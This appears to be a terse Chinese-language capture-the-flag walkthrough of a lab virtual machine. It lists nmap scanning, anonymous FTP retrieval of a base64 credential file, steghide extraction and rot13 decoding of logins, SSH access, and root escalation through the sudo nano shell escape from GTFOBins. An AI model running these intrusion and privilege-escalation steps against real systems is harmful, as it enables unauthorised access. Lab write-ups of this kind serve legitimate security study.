1、nmap -sn 192.168.8.0/24
2、nmap -p- -A 192.168.8.150
ftp端口可以匿名访问,ssh端口是55077
3、ftp 192.168.8.150 用户 anonymous
get cred.txt
get welcome
4、cat cred.txt |base64 -d
5、登录网站,点击About us 下载压缩包
5、查看隐写信息
steghide info funny.bmp
steghide info funny.jpg
6、获取隐写信息
steghide extract -sf funny.bmp
steghide extract -sf funny.jpg
7 rot13编码,获得用户名、密码,ssh登录
8、ssh wtf@192.168.8.150 -p 55077
Download目录
Document目录得到用户名、密码,切换n00b
su - n00b
9、/home/rooot目录
10、sudo -l 发现无需密码执行nano命令
11、 nano提权 (nano | GTFOBins)
sudo nano
^R^X
reset; sh 1>&0 2>&0
------------------------------------------------------------------
总结:
1、隐写技术 steghide info funny.bmp ;steghide exrtact -sf funny.bmp
2、ftp:
登录:ftp 192.168.8.150 用户 anonymous
读取:get cred.txt
3、nano提权